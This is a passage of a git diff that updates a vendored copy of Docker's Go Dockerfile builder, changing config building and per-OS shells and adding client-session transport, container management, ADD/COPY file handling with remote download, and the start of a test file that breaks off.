-func BuildFromConfig(config *container.Config, changes []string) (*container.Config, error) {
-	b, err := NewBuilder(context.Background(), nil, nil, nil, nil)
-	if err != nil {
-		return nil, err
+func BuildFromConfig(config *container.Config, changes []string, os string) (*container.Config, error) {
+	if !system.IsOSSupported(os) {
+		return nil, errdefs.InvalidParameter(system.ErrNotSupportedOperatingSystem)
+	}
+	if len(changes) == 0 {
+		return config, nil
 	}
 
-	ast, err := parser.Parse(bytes.NewBufferString(strings.Join(changes, "\n")), &b.directive)
+	dockerfile, err := parser.Parse(bytes.NewBufferString(strings.Join(changes, "\n")))
 	if err != nil {
-		return nil, err
+		return nil, errdefs.InvalidParameter(err)
 	}
 
+	b := newBuilder(context.Background(), builderOptions{
+		Options: &types.ImageBuildOptions{NoCache: true},
+	})
+
 	// ensure that the commands are valid
-	for _, n := range ast.Children {
+	for _, n := range dockerfile.AST.Children {
 		if !validCommitCommands[n.Value] {
-			return nil, fmt.Errorf("%s is not a valid change command", n.Value)
+			return nil, errdefs.InvalidParameter(errors.Errorf("%s is not a valid change command", n.Value))
 		}
 	}
 
-	b.runConfig = config
 	b.Stdout = ioutil.Discard
 	b.Stderr = ioutil.Discard
 	b.disableCommit = true
 
-	total := len(ast.Children)
-	for _, n := range ast.Children {
-		if err := b.checkDispatch(n, false); err != nil {
-			return nil, err
+	var commands []instructions.Command
+	for _, n := range dockerfile.AST.Children {
+		cmd, err := instructions.ParseCommand(n)
+		if err != nil {
+			return nil, errdefs.InvalidParameter(err)
 		}
+		commands = append(commands, cmd)
 	}
 
-	for i, n := range ast.Children {
-		if err := b.dispatch(i, total, n); err != nil {
-			return nil, err
+	dispatchRequest := newDispatchRequest(b, dockerfile.EscapeToken, nil, NewBuildArgs(b.options.BuildArgs), newStagesBuildResults())
+	// We make mutations to the configuration, ensure we have a copy
+	dispatchRequest.state.runConfig = copyRunConfig(config)
+	dispatchRequest.state.imageID = config.Image
+	dispatchRequest.state.operatingSystem = os
+	for _, cmd := range commands {
+		err := dispatch(dispatchRequest, cmd)
+		if err != nil {
+			return nil, errdefs.InvalidParameter(err)
 		}
+		dispatchRequest.state.updateRunConfig()
 	}
 
-	return b.runConfig, nil
+	return dispatchRequest.state.runConfig, nil
+}
+
+func convertMapToEnvList(m map[string]string) []string {
+	result := []string{}
+	for k, v := range m {
+		result = append(result, k+"="+v)
+	}
+	return result
 }
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/builder_unix.go b/vendor/github.com/docker/docker/builder/dockerfile/builder_unix.go
index 76a7ce74f9..c4453459b3 100644
--- a/vendor/github.com/docker/docker/builder/dockerfile/builder_unix.go
+++ b/vendor/github.com/docker/docker/builder/dockerfile/builder_unix.go
@@ -1,5 +1,7 @@
 // +build !windows
 
-package dockerfile
+package dockerfile // import "github.com/docker/docker/builder/dockerfile"
 
-var defaultShell = []string{"/bin/sh", "-c"}
+func defaultShellForOS(os string) []string {
+	return []string{"/bin/sh", "-c"}
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/builder_windows.go b/vendor/github.com/docker/docker/builder/dockerfile/builder_windows.go
index 37e9fbcf4b..fbafa52aec 100644
--- a/vendor/github.com/docker/docker/builder/dockerfile/builder_windows.go
+++ b/vendor/github.com/docker/docker/builder/dockerfile/builder_windows.go
@@ -1,3 +1,8 @@
-package dockerfile
+package dockerfile // import "github.com/docker/docker/builder/dockerfile"
 
-var defaultShell = []string{"cmd", "/S", "/C"}
+func defaultShellForOS(os string) []string {
+	if os == "linux" {
+		return []string{"/bin/sh", "-c"}
+	}
+	return []string{"cmd", "/S", "/C"}
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/clientsession.go b/vendor/github.com/docker/docker/builder/dockerfile/clientsession.go
new file mode 100644
index 0000000000..b48090d7b5
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/clientsession.go
@@ -0,0 +1,76 @@
+package dockerfile // import "github.com/docker/docker/builder/dockerfile"
+
+import (
+	"context"
+	"time"
+
+	"github.com/docker/docker/builder/fscache"
+	"github.com/docker/docker/builder/remotecontext"
+	"github.com/moby/buildkit/session"
+	"github.com/moby/buildkit/session/filesync"
+	"github.com/pkg/errors"
+)
+
+const sessionConnectTimeout = 5 * time.Second
+
+// ClientSessionTransport is a transport for copying files from docker client
+// to the daemon.
+type ClientSessionTransport struct{}
+
+// NewClientSessionTransport returns new ClientSessionTransport instance
+func NewClientSessionTransport() *ClientSessionTransport {
+	return &ClientSessionTransport{}
+}
+
+// Copy data from a remote to a destination directory.
+func (cst *ClientSessionTransport) Copy(ctx context.Context, id fscache.RemoteIdentifier, dest string, cu filesync.CacheUpdater) error {
+	csi, ok := id.(*ClientSessionSourceIdentifier)
+	if !ok {
+		return errors.New("invalid identifier for client session")
+	}
+
+	return filesync.FSSync(ctx, csi.caller, filesync.FSSendRequestOpt{
+		IncludePatterns: csi.includePatterns,
+		DestDir:         dest,
+		CacheUpdater:    cu,
+	})
+}
+
+// ClientSessionSourceIdentifier is an identifier that can be used for requesting
+// files from remote client
+type ClientSessionSourceIdentifier struct {
+	includePatterns []string
+	caller          session.Caller
+	uuid            string
+}
+
+// NewClientSessionSourceIdentifier returns new ClientSessionSourceIdentifier instance
+func NewClientSessionSourceIdentifier(ctx context.Context, sg SessionGetter, uuid string) (*ClientSessionSourceIdentifier, error) {
+	csi := &ClientSessionSourceIdentifier{
+		uuid: uuid,
+	}
+	caller, err := sg.Get(ctx, uuid)
+	if err != nil {
+		return nil, errors.Wrapf(err, "failed to get session for %s", uuid)
+	}
+
+	csi.caller = caller
+	return csi, nil
+}
+
+// Transport returns transport identifier for remote identifier
+func (csi *ClientSessionSourceIdentifier) Transport() string {
+	return remotecontext.ClientSessionRemote
+}
+
+// SharedKey returns shared key for remote identifier. Shared key is used
+// for finding the base for a repeated transfer.
+func (csi *ClientSessionSourceIdentifier) SharedKey() string {
+	return csi.caller.SharedKey()
+}
+
+// Key returns unique key for remote identifier. Requests with same key return
+// same data.
+func (csi *ClientSessionSourceIdentifier) Key() string {
+	return csi.uuid
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/command/command.go b/vendor/github.com/docker/docker/builder/dockerfile/command/command.go
deleted file mode 100644
index f23c6874b5..0000000000
--- a/vendor/github.com/docker/docker/builder/dockerfile/command/command.go
+++ /dev/null
@@ -1,46 +0,0 @@
-// Package command contains the set of Dockerfile commands.
-package command
-
-// Define constants for the command strings
-const (
-	Add         = "add"
-	Arg         = "arg"
-	Cmd         = "cmd"
-	Copy        = "copy"
-	Entrypoint  = "entrypoint"
-	Env         = "env"
-	Expose      = "expose"
-	From        = "from"
-	Healthcheck = "healthcheck"
-	Label       = "label"
-	Maintainer  = "maintainer"
-	Onbuild     = "onbuild"
-	Run         = "run"
-	Shell       = "shell"
-	StopSignal  = "stopsignal"
-	User        = "user"
-	Volume      = "volume"
-	Workdir     = "workdir"
-)
-
-// Commands is list of all Dockerfile commands
-var Commands = map[string]struct{}{
-	Add:         {},
-	Arg:         {},
-	Cmd:         {},
-	Copy:        {},
-	Entrypoint:  {},
-	Env:         {},
-	Expose:      {},
-	From:        {},
-	Healthcheck: {},
-	Label:       {},
-	Maintainer:  {},
-	Onbuild:     {},
-	Run:         {},
-	Shell:       {},
-	StopSignal:  {},
-	User:        {},
-	Volume:      {},
-	Workdir:     {},
-}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/containerbackend.go b/vendor/github.com/docker/docker/builder/dockerfile/containerbackend.go
new file mode 100644
index 0000000000..54adfb13f7
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/containerbackend.go
@@ -0,0 +1,146 @@
+package dockerfile // import "github.com/docker/docker/builder/dockerfile"
+
+import (
+	"context"
+	"fmt"
+	"io"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/builder"
+	containerpkg "github.com/docker/docker/container"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
+)
+
+type containerManager struct {
+	tmpContainers map[string]struct{}
+	backend       builder.ExecBackend
+}
+
+// newContainerManager creates a new container backend
+func newContainerManager(docker builder.ExecBackend) *containerManager {
+	return &containerManager{
+		backend:       docker,
+		tmpContainers: make(map[string]struct{}),
+	}
+}
+
+// Create a container
+func (c *containerManager) Create(runConfig *container.Config, hostConfig *container.HostConfig) (container.ContainerCreateCreatedBody, error) {
+	container, err := c.backend.ContainerCreate(types.ContainerCreateConfig{
+		Config:     runConfig,
+		HostConfig: hostConfig,
+	})
+	if err != nil {
+		return container, err
+	}
+	c.tmpContainers[container.ID] = struct{}{}
+	return container, nil
+}
+
+var errCancelled = errors.New("build cancelled")
+
+// Run a container by ID
+func (c *containerManager) Run(ctx context.Context, cID string, stdout, stderr io.Writer) (err error) {
+	attached := make(chan struct{})
+	errCh := make(chan error)
+	go func() {
+		errCh <- c.backend.ContainerAttachRaw(cID, nil, stdout, stderr, true, attached)
+	}()
+	select {
+	case err := <-errCh:
+		return err
+	case <-attached:
+	}
+
+	finished := make(chan struct{})
+	cancelErrCh := make(chan error, 1)
+	go func() {
+		select {
+		case <-ctx.Done():
+			logrus.Debugln("Build cancelled, killing and removing container:", cID)
+			c.backend.ContainerKill(cID, 0)
+			c.removeContainer(cID, stdout)
+			cancelErrCh <- errCancelled
+		case <-finished:
+			cancelErrCh <- nil
+		}
+	}()
+
+	if err := c.backend.ContainerStart(cID, nil, "", ""); err != nil {
+		close(finished)
+		logCancellationError(cancelErrCh, "error from ContainerStart: "+err.Error())
+		return err
+	}
+
+	// Block on reading output from container, stop on err or chan closed
+	if err := <-errCh; err != nil {
+		close(finished)
+		logCancellationError(cancelErrCh, "error from errCh: "+err.Error())
+		return err
+	}
+
+	waitC, err := c.backend.ContainerWait(ctx, cID, containerpkg.WaitConditionNotRunning)
+	if err != nil {
+		close(finished)
+		logCancellationError(cancelErrCh, fmt.Sprintf("unable to begin ContainerWait: %s", err))
+		return err
+	}
+
+	if status := <-waitC; status.ExitCode() != 0 {
+		close(finished)
+		logCancellationError(cancelErrCh,
+			fmt.Sprintf("a non-zero code from ContainerWait: %d", status.ExitCode()))
+		return &statusCodeError{code: status.ExitCode(), err: status.Err()}
+	}
+
+	close(finished)
+	return <-cancelErrCh
+}
+
+func logCancellationError(cancelErrCh chan error, msg string) {
+	if cancelErr := <-cancelErrCh; cancelErr != nil {
+		logrus.Debugf("Build cancelled (%v): %s", cancelErr, msg)
+	}
+}
+
+type statusCodeError struct {
+	code int
+	err  error
+}
+
+func (e *statusCodeError) Error() string {
+	if e.err == nil {
+		return ""
+	}
+	return e.err.Error()
+}
+
+func (e *statusCodeError) StatusCode() int {
+	return e.code
+}
+
+func (c *containerManager) removeContainer(containerID string, stdout io.Writer) error {
+	rmConfig := &types.ContainerRmConfig{
+		ForceRemove:  true,
+		RemoveVolume: true,
+	}
+	if err := c.backend.ContainerRm(containerID, rmConfig); err != nil {
+		fmt.Fprintf(stdout, "Error removing intermediate container %s: %v\n", stringid.TruncateID(containerID), err)
+		return err
+	}
+	return nil
+}
+
+// RemoveAll containers managed by this container manager
+func (c *containerManager) RemoveAll(stdout io.Writer) {
+	for containerID := range c.tmpContainers {
+		if err := c.removeContainer(containerID, stdout); err != nil {
+			return
+		}
+		delete(c.tmpContainers, containerID)
+		fmt.Fprintf(stdout, "Removing intermediate container %s\n", stringid.TruncateID(containerID))
+	}
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/copy.go b/vendor/github.com/docker/docker/builder/dockerfile/copy.go
new file mode 100644
index 0000000000..43f40b62f9
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/copy.go
@@ -0,0 +1,560 @@
+package dockerfile // import "github.com/docker/docker/builder/dockerfile"
+
+import (
+	"archive/tar"
+	"fmt"
+	"io"
+	"mime"
+	"net/http"
+	"net/url"
+	"os"
+	"path/filepath"
+	"runtime"
+	"sort"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/builder"
+	"github.com/docker/docker/builder/remotecontext"
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/containerfs"
+	"github.com/docker/docker/pkg/idtools"
+	"github.com/docker/docker/pkg/ioutils"
+	"github.com/docker/docker/pkg/progress"
+	"github.com/docker/docker/pkg/streamformatter"
+	"github.com/docker/docker/pkg/system"
+	"github.com/docker/docker/pkg/urlutil"
+	"github.com/pkg/errors"
+)
+
+const unnamedFilename = "__unnamed__"
+
+type pathCache interface {
+	Load(key interface{}) (value interface{}, ok bool)
+	Store(key, value interface{})
+}
+
+// copyInfo is a data object which stores the metadata about each source file in
+// a copyInstruction
+type copyInfo struct {
+	root         containerfs.ContainerFS
+	path         string
+	hash         string
+	noDecompress bool
+}
+
+func (c copyInfo) fullPath() (string, error) {
+	return c.root.ResolveScopedPath(c.path, true)
+}
+
+func newCopyInfoFromSource(source builder.Source, path string, hash string) copyInfo {
+	return copyInfo{root: source.Root(), path: path, hash: hash}
+}
+
+func newCopyInfos(copyInfos ...copyInfo) []copyInfo {
+	return copyInfos
+}
+
+// copyInstruction is a fully parsed COPY or ADD command that is passed to
+// Builder.performCopy to copy files into the image filesystem
+type copyInstruction struct {
+	cmdName                 string
+	infos                   []copyInfo
+	dest                    string
+	chownStr                string
+	allowLocalDecompression bool
+}
+
+// copier reads a raw COPY or ADD command, fetches remote sources using a downloader,
+// and creates a copyInstruction
+type copier struct {
+	imageSource *imageMount
+	source      builder.Source
+	pathCache   pathCache
+	download    sourceDownloader
+	platform    string
+	// for cleanup. TODO: having copier.cleanup() is error prone and hard to
+	// follow. Code calling performCopy should manage the lifecycle of its params.
+	// Copier should take override source as input, not imageMount.
+	activeLayer builder.RWLayer
+	tmpPaths    []string
+}
+
+func copierFromDispatchRequest(req dispatchRequest, download sourceDownloader, imageSource *imageMount) copier {
+	return copier{
+		source:      req.source,
+		pathCache:   req.builder.pathCache,
+		download:    download,
+		imageSource: imageSource,
+		platform:    req.builder.options.Platform,
+	}
+}
+
+func (o *copier) createCopyInstruction(args []string, cmdName string) (copyInstruction, error) {
+	inst := copyInstruction{cmdName: cmdName}
+	last := len(args) - 1
+
+	// Work in platform-specific filepath semantics
+	inst.dest = fromSlash(args[last], o.platform)
+	separator := string(separator(o.platform))
+	infos, err := o.getCopyInfosForSourcePaths(args[0:last], inst.dest)
+	if err != nil {
+		return inst, errors.Wrapf(err, "%s failed", cmdName)
+	}
+	if len(infos) > 1 && !strings.HasSuffix(inst.dest, separator) {
+		return inst, errors.Errorf("When using %s with more than one source file, the destination must be a directory and end with a /", cmdName)
+	}
+	inst.infos = infos
+	return inst, nil
+}
+
+// getCopyInfosForSourcePaths iterates over the source files and calculate the info
+// needed to copy (e.g. hash value if cached)
+// The dest is used in case source is URL (and ends with "/")
+func (o *copier) getCopyInfosForSourcePaths(sources []string, dest string) ([]copyInfo, error) {
+	var infos []copyInfo
+	for _, orig := range sources {
+		subinfos, err := o.getCopyInfoForSourcePath(orig, dest)
+		if err != nil {
+			return nil, err
+		}
+		infos = append(infos, subinfos...)
+	}
+
+	if len(infos) == 0 {
+		return nil, errors.New("no source files were specified")
+	}
+	return infos, nil
+}
+
+func (o *copier) getCopyInfoForSourcePath(orig, dest string) ([]copyInfo, error) {
+	if !urlutil.IsURL(orig) {
+		return o.calcCopyInfo(orig, true)
+	}
+
+	remote, path, err := o.download(orig)
+	if err != nil {
+		return nil, err
+	}
+	// If path == "" then we are unable to determine filename from src
+	// We have to make sure dest is available
+	if path == "" {
+		if strings.HasSuffix(dest, "/") {
+			return nil, errors.Errorf("cannot determine filename for source %s", orig)
+		}
+		path = unnamedFilename
+	}
+	o.tmpPaths = append(o.tmpPaths, remote.Root().Path())
+
+	hash, err := remote.Hash(path)
+	ci := newCopyInfoFromSource(remote, path, hash)
+	ci.noDecompress = true // data from http shouldn't be extracted even on ADD
+	return newCopyInfos(ci), err
+}
+
+// Cleanup removes any temporary directories created as part of downloading
+// remote files.
+func (o *copier) Cleanup() {
+	for _, path := range o.tmpPaths {
+		os.RemoveAll(path)
+	}
+	o.tmpPaths = []string{}
+	if o.activeLayer != nil {
+		o.activeLayer.Release()
+		o.activeLayer = nil
+	}
+}
+
+// TODO: allowWildcards can probably be removed by refactoring this function further.
+func (o *copier) calcCopyInfo(origPath string, allowWildcards bool) ([]copyInfo, error) {
+	imageSource := o.imageSource
+
+	// TODO: do this when creating copier. Requires validateCopySourcePath
+	// (and other below) to be aware of the difference sources. Why is it only
+	// done on image Source?
+	if imageSource != nil && o.activeLayer == nil {
+		// this needs to be protected against repeated calls as wildcard copy
+		// will call it multiple times for a single COPY
+		var err error
+		rwLayer, err := imageSource.NewRWLayer()
+		if err != nil {
+			return nil, err
+		}
+		o.activeLayer = rwLayer
+
+		o.source, err = remotecontext.NewLazySource(rwLayer.Root())
+		if err != nil {
+			return nil, errors.Wrapf(err, "failed to create context for copy from %s", rwLayer.Root().Path())
+		}
+	}
+
+	if o.source == nil {
+		return nil, errors.Errorf("missing build context")
+	}
+
+	root := o.source.Root()
+
+	if err := validateCopySourcePath(imageSource, origPath, root.OS()); err != nil {
+		return nil, err
+	}
+
+	// Work in source OS specific filepath semantics
+	// For LCOW, this is NOT the daemon OS.
+	origPath = root.FromSlash(origPath)
+	origPath = strings.TrimPrefix(origPath, string(root.Separator()))
+	origPath = strings.TrimPrefix(origPath, "."+string(root.Separator()))
+
+	// Deal with wildcards
+	if allowWildcards && containsWildcards(origPath, root.OS()) {
+		return o.copyWithWildcards(origPath)
+	}
+
+	if imageSource != nil && imageSource.ImageID() != "" {
+		// return a cached copy if one exists
+		if h, ok := o.pathCache.Load(imageSource.ImageID() + origPath); ok {
+			return newCopyInfos(newCopyInfoFromSource(o.source, origPath, h.(string))), nil
+		}
+	}
+
+	// Deal with the single file case
+	copyInfo, err := copyInfoForFile(o.source, origPath)
+	switch {
+	case err != nil:
+		return nil, err
+	case copyInfo.hash != "":
+		o.storeInPathCache(imageSource, origPath, copyInfo.hash)
+		return newCopyInfos(copyInfo), err
+	}
+
+	// TODO: remove, handle dirs in Hash()
+	subfiles, err := walkSource(o.source, origPath)
+	if err != nil {
+		return nil, err
+	}
+
+	hash := hashStringSlice("dir", subfiles)
+	o.storeInPathCache(imageSource, origPath, hash)
+	return newCopyInfos(newCopyInfoFromSource(o.source, origPath, hash)), nil
+}
+
+func containsWildcards(name, platform string) bool {
+	isWindows := platform == "windows"
+	for i := 0; i < len(name); i++ {
+		ch := name[i]
+		if ch == '\\' && !isWindows {
+			i++
+		} else if ch == '*' || ch == '?' || ch == '[' {
+			return true
+		}
+	}
+	return false
+}
+
+func (o *copier) storeInPathCache(im *imageMount, path string, hash string) {
+	if im != nil {
+		o.pathCache.Store(im.ImageID()+path, hash)
+	}
+}
+
+func (o *copier) copyWithWildcards(origPath string) ([]copyInfo, error) {
+	root := o.source.Root()
+	var copyInfos []copyInfo
+	if err := root.Walk(root.Path(), func(path string, info os.FileInfo, err error) error {
+		if err != nil {
+			return err
+		}
+		rel, err := remotecontext.Rel(root, path)
+		if err != nil {
+			return err
+		}
+
+		if rel == "." {
+			return nil
+		}
+		if match, _ := root.Match(origPath, rel); !match {
+			return nil
+		}
+
+		// Note we set allowWildcards to false in case the name has
+		// a * in it
+		subInfos, err := o.calcCopyInfo(rel, false)
+		if err != nil {
+			return err
+		}
+		copyInfos = append(copyInfos, subInfos...)
+		return nil
+	}); err != nil {
+		return nil, err
+	}
+	return copyInfos, nil
+}
+
+func copyInfoForFile(source builder.Source, path string) (copyInfo, error) {
+	fi, err := remotecontext.StatAt(source, path)
+	if err != nil {
+		return copyInfo{}, err
+	}
+
+	if fi.IsDir() {
+		return copyInfo{}, nil
+	}
+	hash, err := source.Hash(path)
+	if err != nil {
+		return copyInfo{}, err
+	}
+	return newCopyInfoFromSource(source, path, "file:"+hash), nil
+}
+
+// TODO: dedupe with copyWithWildcards()
+func walkSource(source builder.Source, origPath string) ([]string, error) {
+	fp, err := remotecontext.FullPath(source, origPath)
+	if err != nil {
+		return nil, err
+	}
+	// Must be a dir
+	var subfiles []string
+	err = source.Root().Walk(fp, func(path string, info os.FileInfo, err error) error {
+		if err != nil {
+			return err
+		}
+		rel, err := remotecontext.Rel(source.Root(), path)
+		if err != nil {
+			return err
+		}
+		if rel == "." {
+			return nil
+		}
+		hash, err := source.Hash(rel)
+		if err != nil {
+			return nil
+		}
+		// we already checked handleHash above
+		subfiles = append(subfiles, hash)
+		return nil
+	})
+	if err != nil {
+		return nil, err
+	}
+
+	sort.Strings(subfiles)
+	return subfiles, nil
+}
+
+type sourceDownloader func(string) (builder.Source, string, error)
+
+func newRemoteSourceDownloader(output, stdout io.Writer) sourceDownloader {
+	return func(url string) (builder.Source, string, error) {
+		return downloadSource(output, stdout, url)
+	}
+}
+
+func errOnSourceDownload(_ string) (builder.Source, string, error) {
+	return nil, "", errors.New("source can't be a URL for COPY")
+}
+
+func getFilenameForDownload(path string, resp *http.Response) string {
+	// Guess filename based on source
+	if path != "" && !strings.HasSuffix(path, "/") {
+		if filename := filepath.Base(filepath.FromSlash(path)); filename != "" {
+			return filename
+		}
+	}
+
+	// Guess filename based on Content-Disposition
+	if contentDisposition := resp.Header.Get("Content-Disposition"); contentDisposition != "" {
+		if _, params, err := mime.ParseMediaType(contentDisposition); err == nil {
+			if params["filename"] != "" && !strings.HasSuffix(params["filename"], "/") {
+				if filename := filepath.Base(filepath.FromSlash(params["filename"])); filename != "" {
+					return filename
+				}
+			}
+		}
+	}
+	return ""
+}
+
+func downloadSource(output io.Writer, stdout io.Writer, srcURL string) (remote builder.Source, p string, err error) {
+	u, err := url.Parse(srcURL)
+	if err != nil {
+		return
+	}
+
+	resp, err := remotecontext.GetWithStatusError(srcURL)
+	if err != nil {
+		return
+	}
+
+	filename := getFilenameForDownload(u.Path, resp)
+
+	// Prepare file in a tmp dir
+	tmpDir, err := ioutils.TempDir("", "docker-remote")
+	if err != nil {
+		return
+	}
+	defer func() {
+		if err != nil {
+			os.RemoveAll(tmpDir)
+		}
+	}()
+	// If filename is empty, the returned filename will be "" but
+	// the tmp filename will be created as "__unnamed__"
+	tmpFileName := filename
+	if filename == "" {
+		tmpFileName = unnamedFilename
+	}
+	tmpFileName = filepath.Join(tmpDir, tmpFileName)
+	tmpFile, err := os.OpenFile(tmpFileName, os.O_RDWR|os.O_CREATE|os.O_EXCL, 0600)
+	if err != nil {
+		return
+	}
+
+	progressOutput := streamformatter.NewJSONProgressOutput(output, true)
+	progressReader := progress.NewProgressReader(resp.Body, progressOutput, resp.ContentLength, "", "Downloading")
+	// Download and dump result to tmp file
+	// TODO: add filehash directly
+	if _, err = io.Copy(tmpFile, progressReader); err != nil {
+		tmpFile.Close()
+		return
+	}
+	// TODO: how important is this random blank line to the output?
+	fmt.Fprintln(stdout)
+
+	// Set the mtime to the Last-Modified header value if present
+	// Otherwise just remove atime and mtime
+	mTime := time.Time{}
+
+	lastMod := resp.Header.Get("Last-Modified")
+	if lastMod != "" {
+		// If we can't parse it then just let it default to 'zero'
+		// otherwise use the parsed time value
+		if parsedMTime, err := http.ParseTime(lastMod); err == nil {
+			mTime = parsedMTime
+		}
+	}
+
+	tmpFile.Close()
+
+	if err = system.Chtimes(tmpFileName, mTime, mTime); err != nil {
+		return
+	}
+
+	lc, err := remotecontext.NewLazySource(containerfs.NewLocalContainerFS(tmpDir))
+	return lc, filename, err
+}
+
+type copyFileOptions struct {
+	decompress bool
+	chownPair  idtools.IDPair
+	archiver   Archiver
+}
+
+type copyEndpoint struct {
+	driver containerfs.Driver
+	path   string
+}
+
+func performCopyForInfo(dest copyInfo, source copyInfo, options copyFileOptions) error {
+	srcPath, err := source.fullPath()
+	if err != nil {
+		return err
+	}
+
+	destPath, err := dest.fullPath()
+	if err != nil {
+		return err
+	}
+
+	archiver := options.archiver
+
+	srcEndpoint := &copyEndpoint{driver: source.root, path: srcPath}
+	destEndpoint := &copyEndpoint{driver: dest.root, path: destPath}
+
+	src, err := source.root.Stat(srcPath)
+	if err != nil {
+		return errors.Wrapf(err, "source path not found")
+	}
+	if src.IsDir() {
+		return copyDirectory(archiver, srcEndpoint, destEndpoint, options.chownPair)
+	}
+	if options.decompress && isArchivePath(source.root, srcPath) && !source.noDecompress {
+		return archiver.UntarPath(srcPath, destPath)
+	}
+
+	destExistsAsDir, err := isExistingDirectory(destEndpoint)
+	if err != nil {
+		return err
+	}
+	// dest.path must be used because destPath has already been cleaned of any
+	// trailing slash
+	if endsInSlash(dest.root, dest.path) || destExistsAsDir {
+		// source.path must be used to get the correct filename when the source
+		// is a symlink
+		destPath = dest.root.Join(destPath, source.root.Base(source.path))
+		destEndpoint = &copyEndpoint{driver: dest.root, path: destPath}
+	}
+	return copyFile(archiver, srcEndpoint, destEndpoint, options.chownPair)
+}
+
+func isArchivePath(driver containerfs.ContainerFS, path string) bool {
+	file, err := driver.Open(path)
+	if err != nil {
+		return false
+	}
+	defer file.Close()
+	rdr, err := archive.DecompressStream(file)
+	if err != nil {
+		return false
+	}
+	r := tar.NewReader(rdr)
+	_, err = r.Next()
+	return err == nil
+}
+
+func copyDirectory(archiver Archiver, source, dest *copyEndpoint, chownPair idtools.IDPair) error {
+	destExists, err := isExistingDirectory(dest)
+	if err != nil {
+		return errors.Wrapf(err, "failed to query destination path")
+	}
+
+	if err := archiver.CopyWithTar(source.path, dest.path); err != nil {
+		return errors.Wrapf(err, "failed to copy directory")
+	}
+	// TODO: @gupta-ak. Investigate how LCOW permission mappings will work.
+	return fixPermissions(source.path, dest.path, chownPair, !destExists)
+}
+
+func copyFile(archiver Archiver, source, dest *copyEndpoint, chownPair idtools.IDPair) error {
+	if runtime.GOOS == "windows" && dest.driver.OS() == "linux" {
+		// LCOW
+		if err := dest.driver.MkdirAll(dest.driver.Dir(dest.path), 0755); err != nil {
+			return errors.Wrapf(err, "failed to create new directory")
+		}
+	} else {
+		if err := idtools.MkdirAllAndChownNew(filepath.Dir(dest.path), 0755, chownPair); err != nil {
+			// Normal containers
+			return errors.Wrapf(err, "failed to create new directory")
+		}
+	}
+
+	if err := archiver.CopyFileWithTar(source.path, dest.path); err != nil {
+		return errors.Wrapf(err, "failed to copy file")
+	}
+	// TODO: @gupta-ak. Investigate how LCOW permission mappings will work.
+	return fixPermissions(source.path, dest.path, chownPair, false)
+}
+
+func endsInSlash(driver containerfs.Driver, path string) bool {
+	return strings.HasSuffix(path, string(driver.Separator()))
+}
+
+// isExistingDirectory returns true if the path exists and is a directory
+func isExistingDirectory(point *copyEndpoint) (bool, error) {
+	destStat, err := point.driver.Stat(point.path)
+	switch {
+	case os.IsNotExist(err):
+		return false, nil
+	case err != nil:
+		return false, err
+	}
+	return destStat.IsDir(), nil
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/copy_test.go b/vendor/github.com/docker/docker/builder/dockerfile/copy_test.go
new file mode 100644
index 0000000000..f559ff4fd8
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/copy_test.go
@@ -0,0 +1,148 @@
+package dockerfile // import "github.com/docker/docker/builder/dockerfile"
+
+import (
+	"net/http"
+	"testing"
+
+	"github.com/docker/docker/pkg/containerfs"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/fs"
+)
+
+func TestIsExistingDirectory(t *testing.T) {
+	tmpfile := fs.NewFile(t, "file-exists-test", fs.WithContent("something"))
+	defer tmpfile.Remove()
+	tmpdir := fs.NewDir(t, "dir-exists-test")
+	defer tmpdir.Remove()
+
+	var testcases = []struct {
+		doc      string
+		path     string
+		expected bool
+	}{
+		{
+			doc:      "directory exists",
+			path:     tmpdir.Path(),
+			expected: true,
+		},
+		{
+			doc:      "path doesn't exist",
+			path:     "/bogus/path/does/not/exist",
+			expected: false,
+		},
+		{
+			doc:      "file exists",
+			path:     tmpfile.Path(),
+			expected: false,
+		},
+	}
+
+	for _, testcase := range testcases {
+		result, err := isExistingDirectory(&copyEndpoint{driver: containerfs.NewLocalDriver(), path: testcase.path})
+		if !assert.Check(t, err) {
+			continue
+		}
+		assert.Check(t, is.Equal(testcase.expected, result), testcase.doc)
+	}
+}
+
+func TestGetFilenameForDownload(t *testing.T) {
+	var testcases = []struct {
+		path        string
+		disposition string
+		expected    string
+	}{
+		{
+			path:     "http://www.example.com/",
+			expected: "",
+		},
+		{
+			path:     "http://www.example.com/xyz",
+			expected: "xyz",
+		},
+		{
+			path:     "http://www.example.com/xyz.html",
+			expected: "xyz.html",
+		},
+		{
+			path:     "http://www.example.com/xyz/",
+			expected: "",
+		},
+		{
+			path:     "http://www.example.com/xyz/uvw",
+			expected: "uvw",
+		},
+		{
+			path:     "http://www.example.com/xyz/uvw.html",
+			expected: "uvw.html",
+		},
+		{
+			path:     "http://www.example.com/xyz/uvw/",
+			expected: "",
+		},
+		{
+			path:     "/",
+			expected: "",
+		},
+		{
+			path:     "/xyz",
+			expected: "xyz",
+		},
+		{
+			path:     "/xyz.html",
+			expected: "xyz.html",
+		},
+		{
+			path:     "/xyz/",
+			expected: "",
+		},
+		{
+			path:        "/xyz/",
+			disposition: "attachment; filename=xyz.html",
+			expected:    "xyz.html",
+		},
+		{
+			disposition: "",
+			expected:    "",
+		},
+		{
+			disposition: "attachment; filename=xyz",
+			expected:    "xyz",
+		},
+		{
+			disposition: "attachment; filename=xyz.html",
+			expected:    "xyz.html",
+		},
+		{
+			disposition: "attachment; filename=\"xyz\"",
+			expected:    "xyz",
+		},
+		{
+			disposition: "attachment; filename=\"xyz.html\"",
+			expected:    "xyz.html",
+		},
+		{
+			disposition: "attachment; filename=\"/xyz.html\"",
+			expected:    "xyz.html",
+		},
+		{
